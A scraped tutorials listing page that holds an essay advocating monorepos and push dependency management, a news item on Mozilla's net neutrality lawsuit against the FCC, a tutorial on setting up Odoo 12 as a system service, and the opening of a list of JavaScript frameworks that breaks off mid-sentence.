Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

6719 Articles
article-image-why-dont-you-have-a-monorepo
Viktor Charypar
01 Feb 2019
27 min read
Save for later

Why don't you have a monorepo?

Viktor Charypar
01 Feb 2019
27 min read
You’ve probably heard that Facebook, Twitter, Google, Microsoft, and other tech industry behemoths keep their entire codebase, all services, applications and tools in a single huge repository - a monorepo. If you’re used to the standard way most teams manage their codebase - one application, service or tool per repository - this sounds very strange. Many people conclude it must only solve problems the likes of Google and Facebook have. This is a guest post by Viktor Charypar, Technical Director at Red Badger. But monorepos are not only useful if you can build a custom version control system to cope. They actually have many advantages even at a smaller scale that standard tools like Git handle just fine. Using a monorepo can result in fewer barriers in the software development lifecycle. It can allow faster feedback loops, less time spent looking for code,, and less time reporting bugs and waiting for them to be fixed. It also makes it much easier to analyze a huge treasure trove of interesting data about how your software is actually built and where problem areas are. We’ve used a monorepo at one of our clients for almost three years and it’s been great. I really don’t see why you wouldn’t. But roughly every two months I tend to have a conversation with someone who’s not used to working in this way and the entire idea just seems totally crazy to them. And the conversation tends to always follow the same path, starting with the sheer size and quickly moving on to dependency management, testing and versioning strategies. It gets complicated. It’s time I finally wrote down a coherent reasoning behind why I believe monorepos should be the default way we manage a codebase. Especially if you’re building something even vaguely microservices based, you have multiple teams and want to share common code. What do you mean “just one repo”? Just so we’re all thinking about the same thing, when I say monorepo, I’m talking about a strategy of storing all the code you as an organization are responsible for. This could be a project, a programme of work, or the entirety of a product and infrastructure code of your company in a single repository, under one revision history. Individual components (libraries, services, custom tools, infrastructure automation, ...) are stored alongside each other in folders. It’s analogous to the UNIX file tree which has a single root, as opposed to multiple, device based roots in Windows operating systems. People not familiar with the concept typically have a fairly strong reaction to the idea. One giant repo? Why would anyone do that? That cannot possibly scale! Many different objections come out, most of them often only tangentially related to storing all the code together. Occasionally, people get almost religious about it (I am talking about engineers after all). Despite being used by some of the largest tech companies, it is a relatively foreign concept and on the surface goes against everything you’ve been taught about not making huge monolithic things. It also seems like we’re fixing things that are not broken: everyone in the world is doing multiple repos, building and sharing artifacts (npm modules, JARs, ruby gems…), using SemVer to version and manage dependencies and long running branches to patch bugs in older versions of code, right? Surely if it’s industry standard it must be the right thing to do. Well, I don’t believe so. I personally think almost every single one of those things is harder, more laborious, more brittle, harder to test and generally just more wasteful than the equivalent approach you get as a consequence of a monorepo. And a few of the capabilities a monorepo enables can’t be replicated in a multi-repo situation even if you build a lot of infrastructure around it, basically because you introduce distributed computing problems and get on the bad side of CAP theorem (we’ll look at this closer below). Apart from letting you make dependency management easier and testing more reliable than it can get with multiple repos, monorepo will also give you a few simple, important, but easy to underestimate advantages. The biggest advantages of using a monorepo It's easier to find and discover your code in a monorepo With a monorepo, there is no question about where all the code is and when you have access to some of it, you can see all of it. It may come as a surprise, but making code visible to the rest of the organization isn’t always the default behavior. Human insecurities get in the way and people create private repositories and squirrel code away to experiment with things “until they are ready”. Typically, when the thing does get “ready”, it now has a Continuous Integration (CI) service attached, many hyperlinks lead to it from emails, chat rooms and internal wikis, several people have cloned the repo and it’s now quite a hassle to move the code to a more visible, obvious place and so it stays where it started. As a consequence, it is often quite hard work to find all the code for the project and gain access to it, which is hard and expensive for new joiners and hurts collaboration in general. You could say this is a matter of discipline and I will agree with you, but why leave to individual discipline what you can simply prevent by telling everyone that all the code belongs in the one repo, it’s completely ok to put even little experiments and pet projects there. You never know what they will grow into and putting them in the repo has basically no cost attached. Visibility aids understanding of how to use internal APIs (internal in the sense of being designed and built by your organisation). The ability to search the entire codebase from within your editor and find usages of the call you’re considering to use is very powerful. Code editors and languages can also be set up for cross-references to work, which means you can follow references into shared libraries and find usages of shared code across the codebase. And I mean the entire codebase. This also enables all kind of analyses to be done on the codebase and its history. Knowing the totality of the codebase and having a history of all the code lets you see dependencies, find parts of the codebase only committed to by a very limited group of people, hotspots changing suspiciously frequently or by a large number of people… Your codebase is the source of truth about what your engineering organization is producing, it contains an incredible amount of interesting information we typically just ignore. Monorepos give you more flexibility when moving code Conway’s Law famously states that “organizations which design systems (...) are constrained to produce designs which are copies of the communication structures of these organisations”. This is due to the level of communication necessary to produce a coherent piece of software. The further away in the organisation an owner of a piece of software is, the harder it is to directly influence it, so you design strict interfaces to insulate yourself from the effect of “their” changes. This typically affects the repository structure as well. There are two problems with this: the structure is generally chosen upfront, before we know what the right shape of the software is, and changing the structure has a cost attached. With each service and library being in a separate repository, the module boundaries are quite a lot stronger than if they are all in one repository. Extracting common pieces of code into a shared library becomes more difficult and involves a setup of a whole new repository - full with CI integration, pull request templates and labels, access control setup… hard work. In a monorepo, these boundaries are much more fluid and flexible: moving code between services and libraries, extracting new ones or inlining libraries back into their consumers all become as easy as general refactoring. There is no reason to use a completely different set of tools to change the small-scale and the large-scale structure of your codebase. The only real downside is tooling support for access control and declaring ownership. However, as monorepos get more popular, this support is getting better. GitHub now supports codeowners, for example. We will get there. A monorepo gives you a single history timeline While visibility and flexibility are quite convenient, the one feature of a monorepo which is very hard (if not impossible) to replicate is the single history timeline. We’ll go into why it’s so hard further below, but for now let’s look at the advantages it brings. Single history timelines gives us a reliable total order of changes to the codebase over time. This means that for any two contributions to the codebase, we can definitively and reliably decide which came first and which came second. It should never be ambiguous. It also means that each commit in a monorepo is a snapshot of the system as it was at that given moment. This enables a really interesting capability: it means cross-cutting changes can be made atomically, safely, in one go. Atomic cross-cutting commits Atomic cross-cutting commits make two specific scenarios much easier to achieve. First, externally forced global migrations are much easier and quicker. Let’s say multiple services use a common database and need the password and we need to rotate it. The password itself is (hopefully!) stored in a secure credential store, but at least the reference to it will be in several different places within the codebase. If the reference changes (let’s say the reference is generated every time), we can update every specific the mention of it at once, in one commit, with a search & replac. This will get everything working again. Second, and more important, we can change APIs and update both producer and all consumers at the same time, atomically. For example, we can add an endpoint to an API service and migrate consumers to use the new endpoint. In the next commit, we can remove the old API endpoint as it’s no longer needed. If you're trying to do this across multiple repositories with their own histories, the change will have to be split into several parallel commits. This leaves the potential for the two changes to overlap and happen in the wrong order. Some consumers can get migrated, then the endpoint gets removed, then the rest of the consumers get migrated. The mid-stage is an inconsistent state and an attempt to use the not-yet-migrated consumers will fail attempting to call an API endpoint that no longer exists. Monorepos remove inconsistencies in your dependencies Inconsistencies between dependent modules are the entire reason why dependency management and versioning exist. In a monorepo, the above scenario simply can’t happen. And that’s how the conversation about storing code in one place ends up being about versioning and dependency management. Monorepos essentially make the problem go away (which is my favourite kind of problem solving). Okay, this isn’t entirely true. There are still consequences to making breaking changes to APIs. For one, you need to update all the consumers, which is work, but you also need to build all of them, test everything works and deploy it all. This is quite hard for (micro)services that get individually deployed: making coordinated deployment of multiple services atomic is possible but not trivial. You can use a blue-green strategy, for example, to make sure there is no moment in time where only some services changed but not others. It gets harder for shared libraries. Building and publishing artifacts of new versions and updating all consumers to use the new version are still at least two commits, otherwise you’d be referring to versions that won’t exist until the builds finish. Now, things are getting inconsistent again and the view of what is supposed to work together is getting blurred in time again. And what if someone sneaks some changes in between the two commits. We are, once again, in a race. Unless... Building from the latest source Yes. What if instead of building and publishing shared code as prebuilt artifacts (binaries, jars, gems, npm modules), we build each deployable service completely from source. Every time a service changes, it is entirely rebuilt, including all dependencies. This is a fair bit of work for some compiled languages. However, it can be optimised with incremental build tools which skip work that’s already been done and cached. Some, like Go, solve it by simply having designed for a fast compiler. For dynamic languages, it’s just a matter of setting up include paths correctly and bundling all the relevant code. The added benefit here is you don’t need to do anything special if you’re working on a set of interdependent projects locally. No more `npm link`. The more interesting consequence is how this affects changing a shared dependency. When building from source, you have to make sure every time that happens, all the consumers get rebuilt using it. This is great, everyone gets the latest and greatest things immediately. ...right? Don’t worry, I can hear the alarm bells ringing in your head all the way from here. Your service depends on tens, if not hundreds of libraries. Any time anyone makes a mistake and breaks any of them, it breaks your code? Hell no. But hear me out. This is a problem of understanding dependencies and testing consumers. The important consequence of building from source is you now have a single handle on what is supposed to work together. There are no separate versions, you know what to test and it’s just one thing at any one time. Push dependency management In manual dependency update management - I will call it “pull” dependency management - you as a consumer are responsible for updating your dependencies as you see fit and making sure everything still works. If you find a bug, you simply don’t upgrade. Instead you report the bug to the maintainer and expect them to fix it. This can be months after the bug was introduced and the bug may have already been fixed in a newer version you haven’t yet upgraded to because things have moved on quite a bit while you were busy hitting a deadline and it would now be a sizable investment to upgrade. Now you’re a little stuck and all the ways out are a significant amount of work for someone, all that because the feedback loop is too long. Normally, as a library maintainer, you’re never quite certain how to make sure you’re not breaking anything. Even if you could run your consumers’ test suites, which consumers at what versions do you test against? And as a DevOps team doing 24/7 support for a system, how do you know which version or versions of a library is used across your services. What do you need to update to roll out that important bug fix to your customers? In push dependency management, quite a few things are the other way round. As a consumer, you’re not responsible for updating, it is done for you - effectively, you depended on the “latest” version of everything. Every time a maintainer of the library makes a change you are responsible for testing for regressions. No, not manually! You do have unit tests, right? Right?? Please have a solid regression test suite you trust, it’s 2019. So with your unit test suite, all you need to do is run it. Actually no, let’s let the maintainer run it. If they introduce a problem, they get immediate feedback from you, before their change ever hits the master branch. And this is the contract agreement in push dependency management: If you make a change and break anyone, you are responsible for fixing them. They are responsible for supplying a good enough, by their own standard, automated mechanism for you to verify things still work. The definition of “works” is the tests pass. Seriously though, you need to have a decent regression test suite! Continuous integration for push dependencies: the final piece of the monorepo puzzle The main missing piece of tooling around monorepos is support for push dependencies in CI systems. It’s quite straightforward to implement the strategy yourself, but it’s still hard enough to be worth some shared tooling. Unfortunately, the existing build tools geared towards monorepos like Bazel and Buck take over the entire build process from more familiar tools (like Maven or Babel) and you need to switch to them. Although to be fair, in exchange, you get very performant incremental builds. A lighter tooling, which lets you express dependencies between components in a monorepo, in a language agnostic way, and is only responsible for deciding which build jobs needs to be triggered given a set of changed components in a commit seems to be missing. So I built one. It’s far from perfect, but it should do the trick. Hopefully, someone with more time on their hands will eventually come up with something similarly cheap to introduce into your build system and the community will adopt it more widely. The main takeaway is that if we build from source in a monorepo we can set up a central Continuous Integration system responsible for triggering builds for all projects potentially affected by a change, intended to make sure you didn’t break anything with the work you did, whether it belongs to you or someone else. This is next to impossible in a multi-repo codebase because of the blurriness of history mentioned above. It’s interesting to me that we have this problem today in the larger ecosystem. Everywhere. And we stumble forward and somewhat successfully live with upstream changes occasionally breaking us, because we don’t really have a better choice. We don’t have the ability to test all the consumers in the world and fix things when we break them. But if we can, at least for our own codebase, why wouldn’t we do that? Along with a “you broke it you fix it” policy. Building from source in a monorepo allows that. It also makes it significantly easier to make breaking changes much harder to make. That said... About breaking changes There are two kinds of changes that break the consumer - the ones you introduce by accident, intending the keep backwards compatibility, and then the intentional ones. The first kind should not be too laborious to fix: once you find out what’s wrong, fix it in one place, make sure you didn’t break anything else, done. The second kind is harder. If you absolutely have to make an intentional breaking change, you will need to update all the consumers. Yes. That’s the deal. And that’s also fair. I’m not sure why we’re okay with breaking changes being intentionally introduced upstream on a whim. In any other area of human endeavour, a breach of contract makes people angry and they will expect you to make good by them. Yet we accept breaking changes in software as a fact of life. “It’s fine, I bumped the major version!” Semantic versioning: a bad idea It’s not fine. In fact, semantic versioning is just a bad idea. I know that’s a bold claim and this is a whole separate article (which I promise to write soon), but I’ll try to do it at least some justice here. Semantic versioning is meant to convey some meaning with the version number, but the chosen meanings it expresses are completely arbitrary. First of all, semver only talks about API contract, not behaviour. Adding side effects or changing performance characteristics of an API call for worse while keeping the data interface the same is a completely legal patch level change. And I bet you consider that a breaking change, because it will break your app. Second, does anyone really care about minor vs. patch? The promise is the API doesn’t break. So really we only care about major or other. Major is a dealbreaker, otherwise we’re ok. From a consumer perspective a major version bump spells trouble and potentially a lot of work. Making breaking changes is a mean thing to do to your consumers and you can and should avoid them. Just keep the old API around and working and add the new one next to it. As for version numbers, the most important meaning to convey seems to be “how old?” because code tends to rot, and so versioning by date might be a good choice. But, you say, I’ll have more and more code to maintain! Well yes, of course. And that’s the other problem with semver, the expectation that even old versions still get patches and fixes. It’s not very explicitly stated but it’s there. And because we typically maintain old versions on long-running branches in version control, it’s not even very visible in the codebase. What if you kept older APIs around, but deprecated them and the answer to bugs in them would be to migrate to the newer version of a particular call, which doesn’t have the bug? Would you care about having that old code? It just sits there in the codebase, until nobody uses it. It would also be much less work for the consumer, it’s just one particular call. Also, the bug is typically deeper inside your code, so it’s actually more likely you can fix it in one go for all the API surfaces, old or new. Doing the same thing in the branching model is N times the work (for N maintenance branches). There are technologies that follow this model out of necessity. One example is GraphQL, which was built to solve (among other things) the problem of many old API consumers in people’s hands and the need to support all of them for at least some time. In GraphQL, you deprecate data fields in your API and they become invisible in documentation and introspection calls, but they still work as they used to. Possibly forever. Or at least until barely anyone uses them. The other option you have if you want to keep an older version of a library around and maintain it in a monorepo is to make a copy of the folder and work on the two separately. It’s the same thing as cutting a long running branch, you’re just making a copy in “file space” not “branch space”. And it’s more visible and representative of reality - both versions exist as first-class components being maintained. There are many different versioning and maintenance strategies you could adopt, but in my opinion the preference should be to invest effort into the latest version, making breaking changes only when absolutely inevitable (and at that point, isn’t the new version just a new thing? Like Luxon, the next version of Moment.js) and making updates trivial for your consumers. And if it’s trivial you can do it for them. Ultimately it was your decision to break the API, so you should also do the work, it’s only fair and it makes you evaluate the cost-benefit trade-off of the change. In a monorepo with building from source, this versioning strategy happens naturally. You can, however, adopt others. You just lose some of the guarantees and make feedback loops longer. Versioning strategy is really an orthogonal concept to storing code in a single repository, but the relative costs do change if you use one. Versioning by using a single version that cuts across the system becomes a lot cheaper, which means breaking changes becomes more expensive. This tends to lead to more discussions about versioning. This is actually true for most of the things we covered above. You can, but don’t have to adopt these strategies with a monorepo. Pay as you go monorepos It’s totally possible to just store everything in a single repo and not do anything else. You’ll get the visibility of what exists and flexibility of boundaries and ownership. You can still publish individual build artifacts and pull-manage dependencies (but you’d be missing out). Add building from source and you get the single snapshot benefit - you now know what code runs in a particular version of your system and to an extent, you can think about it as a monolith, despite being formed of many different independent modules and services. Add dependency aware continuous integration and the feedback loop around issues introduced while working on the codebase gets much much shorter, allowing you to go faster and waste less time on carefully managing versions, reporting bugs, making big forklift upgrades, etc. Things tend to get out of control much less. It’s simpler. Best of all, you can mix and match strategies. If you have a hugely popular library in your monorepo and each change in it triggers a build of hundreds of consumers, it only takes a couple of those builds being flakey and it will make it very hard to get builds for the changes in the library to pass. This is really a CI problem to fix (and there are so many interesting strategies out there), but sometimes you can’t do that easily. You could also say the feedback loop is now too tight for the scale and start versioning the library’s intentional releases. This still doesn’t mean you have to publish versioned artifacts. You can have a stable copy of the library in the repo, which consumers depend on, and a development copy next to it which the maintainers work on. Releasing then means moving changes from the development folder to the release one and getting its builds to pass. Or, if you wish, you can publish artifacts and let consumers pull them on their own time and report bugs to you. And you still don’t need to promise fixes for older versions without upgrading to the latest (Libraries should really have a published “code of maintenance” outlining the promises and setting maintenance expectations). And if you have to, I would again recommend making a copy, not branching. In fact, in a monorepo, branching might just not be a very good idea. Temporary branches are still useful to work on proposed changes, but long-running branches just hide the full truth about the system. And so does relying on old commits. The copies of code being used exist either way, the are still relevant and you still need to consider them for testing and security patching, they are just hidden in less apparent dimensions of the codebase “space” - branch dimension or time dimension. These are hard to think about and visualise, so maybe it’s not a good idea to use them to keep relevant and current versions of the code and stick to them as change proposal and “time travel” mechanisms. Hopefully you can see that there’s an entire spectrum of strategies you can follow but don’t have to adopt wholesale. I’m sold, but... can’t we do all this with a multi-repo? Most of the things discussed above are not really strictly dependent on monorepos, they are more a natural consequence of adopting one. You can follow versioning strategies other than semver outside of a monorepo. You can probably implement an automated version bumping system which will upgrade all the dependents of a library and test them, logging issues if they don’t pass. What you can’t do outside of a monorepo, as far as I can tell, is the atomic snapshotting of history to have a clear view of the system. And have the same view of the system a year ago. And be able to reproduce it. As soon as multiple parallel version histories are established, this ability goes away and you introduce distributed state. It’s impossible to update all the “heads” in this multi history at the same time, consistently. In version control, like git, the histories are ordered by the “follows” relationship. Later version follows - points to - its predecessor. To get a consistent, canonical view of time, there needs to be a single entrypoint. Without this central entry point, it’s impossible to define a consistent order across the entire set, it depends on where we start looking. Essentially, you already chose Partition from the three CAP properties. Now you can pick either Consistency or Availability. Typically, availability is important and so you lose consistency. You could choose consistency instead, but that would mean you can’t have availability - in order to get a consistent snapshot of the state of all of the repos, write access would need to be stopped while the snapshot is taken. In a monorepo, you don’t have partitioning, and can therefore have consistency and availability. From a physics perspective, multiple repositories with their own history effectively create a kind of spacetime, where each repository is a place and references across repos represent information propagating across space. The speed of that propagation isn’t infinite - it’s not instant. If changes happen in two places close enough in time, from the perspective of those two places, they happen in a globally inconsistent order, first the local change, then the remote change. Neither of the views is better and more true and it’s impossible to decide which of the changes came first. Unless, that is, we introduce an agreed upon central point which references all the repositories that exist and every time one of them updates, the reference in this master gets updated and a revision is created. Congratulations, we created a monorepo, well done us. The benefits of going all-in when it comes to monorepos As I said at the beginning, adopting the monorepo approach fully will result in fewer barriers in the software development lifecycle. You get faster feedback loops - the ability to test consumers of libraries before checking in a change and immediate feedback. You will spend less time looking for code and working out how it gets assembled together. You won’t need to set up repositories or ask for permissions to contribute. You can spend more time-solving problems to help your customers instead of problems you created for yourself. It takes some time to get the tooling setup right, but you only do it once, all the later projects get the setup for free. Some of the tooling is a little lacking, but in our experience there are no show stoppers. A stable, reliable CI is an absolute must, but that’s regardless of monorepos. Monorepos should also help make builds repeatable. The repo does eventually get big, but it takes years and years and hundreds of people to get to a size where it actually becomes a real problem. The Linux kernel is a monorepo and it’s probably still at least an order of magnitude bigger than your project (it is bigger than ours anyway, despite having hundreds of engineers involved at this point). Basically, you’re not Google or Microsoft. And when you are, you’ll be able to afford optimising your version control system. The UX of your code review and source hosting tooling is probably the first thing that will break, not the underlying infrastructure. For smoother scaling, the one recommendation I have is to set a file size limit - accidentally committed large files are quite hard to remove, at least in git. After using a monorepo for over two years we’re still yet to have any big technical issues with it (plenty of political ones, but that’s a story for another day) and we see the same benefits as Google reported in their recent paper. I honestly don’t really know why you would start with any other strategy. Viktor Charypar is Technical Director at Red badger, a digital consultancy based in London. You can follow him on Twitter @charypar or read more of his writing on the Red Badger blog here.
Read more
  • 0
  • 0
  • 9243

article-image-the-future-of-net-neutrality-is-being-decided-in-court-right-now-as-mozilla-takes-on-the-fcc
Richard Gall
01 Feb 2019
3 min read
Save for later

The future of net neutrality is being decided in court right now, as Mozilla takes on the FCC

Richard Gall
01 Feb 2019
3 min read
Back in August, in a bid to defend net neutrality, Mozilla filed a case against the FCC, opposing the FCC's rollback of the laws that defend users against the interests of ISPs. Today, the oral arguments in that case have come to court in Washington D.C., making it an important day in the fight to save the very principle of net neutrality. What is net neutrality and why did the FCC roll it back? To understand the significance of today, it's important to know what net neutrality is, exactly, and how and why the FCC removed the rules that put it in place. Essentially, net neutrality is the principle that all internet service providers must treat all content and services equally. It means your internet provider can't slow your access to Netflix, or prevent you from accessing any other content for commercial reasons. Essentially net neutrality protects users like you and me, and prevents a market emerging where companies and individuals can pay more for faster speeds or more access to services. The argument against net neutrality is grounded in the liberal economic principle that understands regulation as necessarily restrictive. It suggests that regulation will actually lead to price rises, rather than pushing them down. From a political perspective too, the argument is that regulating the internet in this way effectively puts it under government control - that's misleading, but it's easy to see how that argument can be peddled. The two key arguments in the net neutrality case against the FCC The case will center upon two arguments. The first is whether the FCC's decision to repeal the legislation was warranted in the first place. As a Federal agency, the FCC is forbidden by the Administrative Procedure Act to make decisions that could be described as "arbitrary and capricious." In essence, this means they can't make decisions based on the opinions and personal judgements of those that lead the organization. All regulatory decisions need to be clear and considered, and, of course, backed up by compelling evidence. From the FCC's perspective, the decision to repeal net neutrality legislation was sound. The agency argued, for example, that the rules were damaging investment in infrastructure, and restricting private businesses to develop their products and services in a way that would ultimately benefit users. This position has, however, been disputed by a Wired report that found that investment was high from market leaders during the period when net neutrality legislation was in place. The second point that will be crucial is whether ISPs are simply an information service or telecommunications provider. This distinction is important - information services are less tightly regulated than telecommunications (think of all the various ways subscription services make money). Under net neutrality rules, ISPs are regarded as telecommunications companies - by removing net neutrality rules, the FCC is saying they are merely information services. At court already this morning, Pantelis Michalopoulos, one of the plaintiff attorneys against the FCC, compared the assertion that an ISP isn't a telecommunications company to Magritte's famous painting The Treachery of Images. "This is like a surrealist painting that shows a pipe and says ‘this is not a pipe,’” The EFF reports he said in court. https://twitter.com/EFFLive/status/1091351488540995584 How to follow the case Representatives from the Electronic Frontier Foundation are live tweeting from the courtroom from @EFFLive. If you want to follow the debates and arguments - as well as plenty of useful commentary and information from the EFF, make sure you follow them.
Read more
  • 0
  • 0
  • 1689

article-image-how-to-set-up-odoo-as-a-system-service-tutorial
Sugandha Lahoti
01 Feb 2019
7 min read
Save for later

How to set up Odoo as a system service [Tutorial]

Sugandha Lahoti
01 Feb 2019
7 min read
In this tutorial, we'll learn the basics of setting up Odoo as a system service.  This article is taken from the book Odoo 12 Development Essentials by Daniel Reis. This book will help you extend your skills with Odoo 12 to build resourceful and open source business applications. Setting up and maintaining servers is a non-trivial topic in itself and should be done by specialists. The information given here is not enough to ensure an average user can create a resilient and secure environment that hosts sensitive data and services. In this article, we'll discuss the following topics: Setting up Odoo as a system service, including the following: Creating a systemd service Creating an Upstart or sysvinit service Checking the Odoo service from the command line The code and scripts used here can be found in the ch14/ directory of the Git repository. Setting up Odoo as a system service We will learn how to set up Odoo as a system service and have it started automatically when the system boots. In Ubuntu or Debian, the init system is responsible for starting services. Historically, Debian (and derived operating systems) has used sysvinit, and Ubuntu has used a compatible system called Upstart. Recently, however, this has changed, and the init system used in both the latest Debian and Ubuntu editions is systemd. This means that there are now two different ways to install a system service, and you need to pick the correct one depending on the version of your operating system. On Ubuntu 16.04 and later, you should be using systemd. However, older versions are still used in many cloud providers, so there is a good chance that you might need to use it. To check whether systemd is used in your system, try the following command: $ man init This command opens the documentation for the currently init system in use, so you're able to check what is being used. Ubuntu on Windows Subsystem for Linux (WSL) is an environment good enough for development only, but may have some quirks and is entirely inappropriate for running production servers. At the time of writing, our tests revealed that while man init identifies the init system as systemd, installing a systemd service doesn't work, while installing a sysvinit service does. Creating a systemd service If the operating system you're using is recent, such as Debian 8 or Ubuntu 16.04, you should be using systemd for the init system. To add a new service to the system, simply create a file describing it. Create a /lib/systemd/system/odoo.service file with the following content: [Unit] Description=Odoo After=postgresql.service [Service] Type=simple User=odoo Group=odoo ExecStart=/home/odoo/odoo-12/odoo-bin -c /etc/odoo/odoo.conf [Install] WantedBy=multi-user.target The Odoo source code includes a sample odoo.service file inside the debian/ directory. Instead of creating a new file, you can copy it and then make the required changes. At the very least, the ExecStart option should be changed according to your setup. Next, we need to register the new service with the following code: $ sudo systemctl enable odoo.service To start this new service, use the following command: $ sudo systemctl start odoo To check its status, run the following command: $ sudo systemctl status odoo Finally, if you want to stop it, use the following command: $ sudo systemctl stop odoo Creating an Upstart or sysvinit service If you're using an older operating system, such as Debian 7 or Ubuntu 15.04, chances are your system is sysvinit or Upstart. For the purpose of creating a system service, both should behave in the same way. Some cloud Virtual Private Server (VPS) services are still based on older Ubuntu images, so this might be aware of this scenario in case you encounter it when deploying your Odoo server. The Odoo source code includes an init script used for the Debian packaged distribution. We can use it as our service init script with minor modifications, as follows: $ sudo cp /home/odoo/odoo-12/debian/init /etc/init.d/odoo $ sudo chmod +x /etc/init.d/odoo At this point, you might want to check the content of the init script. The key parameters are assigned to variables at the top of the file, as illustrated in the following example: PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin DAEMON=/usr/bin/odoo NAME=odoo DESC=odoo CONFIG=/etc/odoo/odoo.conf LOGFILE=/var/log/odoo/odoo-server.log PIDFILE=/var/run/${NAME}.pid USER=odoo These variables should be adequate, so we'll prepare the rest of the setup with their default values in mind. However, you can, of course, change them to better suit your needs. The USER variable is the system user under which the server will run. We have already created the expected odoo user. The DAEMON variable is the path to the server executable. Our executable used to start Odoo is in a different location, but we can create the following symbolic link to it: $ sudo ln -s /home/odoo/odoo-12/odoo-bin /usr/bin/odoo $ sudo chown -h odoo /usr/bin/odoo The CONFIG variable is the configuration file we need to use. In a previous section, we created a configuration file in the default expected location, /etc/odoo/odoo.conf. Finally, the LOGFILE variable is the directory where log files should be stored. The expected directory is /var/log/odoo, which we created when we defined the configuration file. Now we should be able to start and stop our Odoo service, as follows: $ sudo /etc/init.d/odoo start Starting odoo: ok Stopping the service is done in a similar way with the following command: $ sudo /etc/init.d/odoo stop Stopping odoo: ok In Ubuntu, the service command can also be used, as follows: $ sudo service odoo start $ sudo service odoo status $ sudo service odoo stop Now we need to make the service start automatically on system boot; this can be done with the following code: $ sudo update-rc.d odoo defaults After this, when we reboot our server, the Odoo service should start automatically and with no errors. It's a good time to verify that all is working as expected. Checking the Odoo service from the command line At this point, we can confirm whether our Odoo instance is up and responding to requests as expected. If Odoo is running properly, we should be able to get a response from it and see no errors in the log file. We can check whether Odoo is responding to HTTP requests inside the server by using the following command: $ curl http://localhost:8069 <html><head><script>window.location = '/web' + location.hash;</script></head></html> In addition, to see what is in the log file, use the following command: $ sudo less /var/log/odoo/odoo-server.log You can also follow what is being added to the log file live, using  tail -f as follows: $ sudo tail -f /var/log/odoo/odoo-server.log Summary In this tutorial, we learned about the steps required for setting up Odoo as a system service. To learn more about Odoo, you should read our book  Odoo 12 Development Essentials. You may also take a look at the official documentation at https://www.odoo.com/documentation. Odoo is an open source product with a vibrant community. Getting involved, asking questions, and contributing is a great way not only to learn but also to build a business network. With this in mind, we can't help mention the Odoo Community Association (OCA), which promotes collaboration and quality open source code. You can learn more about it at odoo‑comunity.org. “Everybody can benefit from adopting Odoo, whether you’re a small start-up or a giant tech company - An interview by Yenthe van Ginneken. Implement an effective CRM system in Odoo 11 [Tutorial] Handle Odoo application data with ORM API [Tutorial]
Read more
  • 0
  • 0
  • 6689

article-image-16-javascript-frameworks-developers-should-learn-in-2019
Bhagyashree R
27 Jan 2019
14 min read
Save for later

16 JavaScript frameworks developers should learn in 2019

Bhagyashree R
27 Jan 2019
14 min read
According to Stack Overflow’s Developer Survey 2018, JavaScript is one of the most widely used programming languages. Thanks to its ever-evolving framework ecosystem to find the best solution for complex and challenging problems. Although JavaScript has spent most of its lifetime being associated with web development, in recent years, its usage seems to be expanding. Not only has it moved from front to back end, we’re also beginning to see it used for things like machine learning and augmented reality. JavaScript’s evolution is driven by frameworks. And although there are a few that seem to be leading the way, there are many other smaller tools that could be well worth your attention in 2019. Let’s take a look at them now. JavaScript web development frameworks React React was first developed by Facebook in 2011 and then open sourced in 2013. Since then it has become one of the most popular JavaScript libraries for building user interfaces. According to npm’s survey, despite a slowdown in React’s growth in 2018, it will be the dominant framework in 2019. The State of JavaScript 2018 survey designates it as “a safe technology to adopt” given its high usage satisfaction ratio and a large user base. In 2018, the React team released versions from 16.3 to 16.7 with some major updates. These updates included new lifecycle methods, Context API, suspense for code splitting, a React Profiler, Create React App 2.0, and more. The team has already laid out its plan for 2019 and will soon be releasing one of the most awaited feature, Hooks. It allows developers to access features such as state without using JavaScript classes. It aims to simplify the code for React components by allowing developers to reuse stateful logic without making any changes to the component hierarchy. Other features will include a concurrent mode to allow component tree rendering without blocking the main thread, suspense for data fetching, and more. Vue Vue was created by Evan You after working for Google using AngularJS in a number of projects. It was first released in 2014. Sharing his motivation for creating Vue, Evan said, "I figured, what if I could just extract the part that I really liked about Angular and build something really lightweight."  Vue has continued to show great adoption among JavaScript developers and I doubt this trend is going to stop anytime soon. According to the npm survey, some developers prefer Vue over React because they feel that it is “easier to get started with, while maintaining extensibility.” Vue is a library that allows developers to build interactive web interfaces. It provides data-reactive components, similar to React, with a simple and flexible API. Unlike React or Angular, one of the benefits of Vue is the clean HTML output it produces. Other JavaScript libraries tend to leave the HTML scattered with extra attributes and classes in the code, whereas Vue removes these to produce clean, semantic output. It provides advanced feature such as routing, state management, and build tooling for complex applications via officially maintained supporting libraries and packages. Angular Google developed AngularJS in 2009 and released its first version in 2012. Since then it saw enthusiastic support and widespread adoption among both enterprises and individuals. AngularJS was originally developed for designers, not developers. While it did saw a few evolutionary improvements in its design, they were not enough to fulfill developer requirements. The later versions, Angular 2, Angular 4, and so on have been upgraded to provide an overall improvement in performance, especially in speed and dependency injection. The new version is simply called Angular, a platform and framework that allows developers to build client applications in HTML and TypeScript. It comes with declarative templates, dependency injection, end to end tooling, and integrated best practices to solve development challenges. While the architecture of AngularJS is based on model-view-controller (MVC) design, Angular has a component-based architecture. Every Angular application consists of at least one component known as the root component. Each component is associated to a class that’s responsible for handling the business logic and a template that represents the view layer. Node.js There has been a lot of debate around whether Node is a framework (it’s really a library), but when talking about web development it is very hard to skip it. Node.js was originally written by Ryan Dahl, which he demonstrated at the the inaugural European JSConf on November 8, 2009. Node.js is an free, open-source, cross-platform JavaScript run-time environment that executes JavaScript code outside of a browser. Node.js follows a "JavaScript everywhere" paradigm by unifying web application development around a single programming language, rather than different languages for server side and client side scripts. At the JSConf 2018, Dahl described some limitations about his server-side JavaScript runtime engine. Many parts of its architecture suffer from limitations including security and how modules are managed. As a solution to this he introduced a new software project, called Deno, a secure TypeScript runtime on V8 JavaScript engine that sets out to correct some of the design flaws in Node.js.   Cross-platform mobile development frameworks React Native The story of React Native started in the summer of 2013 as Facebook’s internal hackathon project and it was later open sourced in 2015. React Native is a JavaScript framework used to build native mobile applications. As you might have already guessed from its name, React Native is based on React, that we discussed earlier. The reason why it is called “native” is that the UI built with React Native consists of native UI widgets that look and 